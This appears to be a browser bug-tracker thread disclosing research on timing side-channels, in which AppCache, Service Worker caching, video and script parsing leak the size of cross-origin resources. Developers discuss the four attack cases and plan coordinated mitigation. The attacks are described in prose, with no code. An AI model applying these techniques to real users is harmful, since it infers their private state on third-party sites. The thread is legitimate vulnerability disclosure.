User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Steps to reproduce: We found that many APIs that handle remote resources expose timing side-channel information that allows an attacker to estimate the size. In our paper (https://vagosec.org/papers/timing-attacks_ccs2015.pdf) we describe four cases where an attacker can obtain timing measurements related to the size of an external resource. The key difference with other web-based timing attacks is that the timing measurement starts *after* the resource has been downloaded. As a result, the timing measurement is not affected by the network condition, and thus (in most cases) much more accurate. One of the attacks, is to use the time the browser requires to load a resource from the cache (after it's been forcefully added there using an Application Cache manifest) as an estimate for its size. I've made a quick demo showing it's trivial to differentiate between files of a different size: https://vagosec.org/labs/timing-attacks/cache-load-time-example.html (for my own convenience, the files are same-origin but it works the same way with cross-origin resource) Actual results: The time required to handle a resource, whether it is when parsing, storing or retrieving a remote resource, is related to the size of this resource. This leads to a side-channel attack that can be used to infer information about the state of a user at a third-party website (have a look at the paper for some real-world cases) Expected results: Not sure what should happen, but it shouldn't be possible to differentiate between two resources if their size differs.
Dan, thoughts here?
I skimmed through the paper, and here's my first impressions. As comment 0, the main idea here is timing attacks that involve loading resources (often loading HTML using something not meant for HTML), but are not dependent on network download speed. The four cases described in the paper are: 1. Video parsing (page 3), but the paper says Firefox is unaffected because it doesn't try to parse files with incorrect ContentType headers. 2. AppCache (page 4). Something about timing how long it takes to load the resource out of the cache. 3. Service Workers (page 5). This uses the Cache API, and sounds similar to the AppCache thing. 4. Script parsing (page 5). Download an HTML file as JS, see how long it takes to load. It will probably throw a syntax error, but the time it takes still leaks information about how big the file is. To get higher precision, they rapidly request the resource over and over, and on non-Firefox browsers there is an optimization that will make only a single request for all of those. So Firefox is going to be more affected by network choppiness. These are all pretty DOM-y so I'm going to move it there for now.
For fetch(), you can only observe the timing of an opaque response body if its executed in a service worker and then passed to FetchEvent.respondWith() for something like an <img> element. The fetch() promise itself resolves when headers are available, not when the body is fully downloaded. The same is true for reading an opaque response from Cache API. You can infer body size from Cache.put() and Cache.add(), however, as the promise resolves when the body is fully written to disk.
Changing the summary to the paper title so when people start searching for it after next week (http://www.sigsac.org/ccs/CCS2015/pro_paper.html) they'll have a better shot at finding it. This isn't an issue Firefox can solve on its own; much of it is inherent in the design of the features. After the paper is published we can work with Chrome folks and other browser vendors to see if there are any reasonable ways to address this, and unhide the bug at that time (since the paper will be public).
The paper has been published in the meantime. Personally, I am in the favour of a structural fix to the extent this is deemed possible. While the paper discusses 4 different attacks, it's quite likely that I missed some things, or that new browser features introduce new timing side-channels (for instance, if SRI didn't require CORS - which was added for reasons unrelated to timing side-channels - it could be leveraged to provide very stable timing measurements).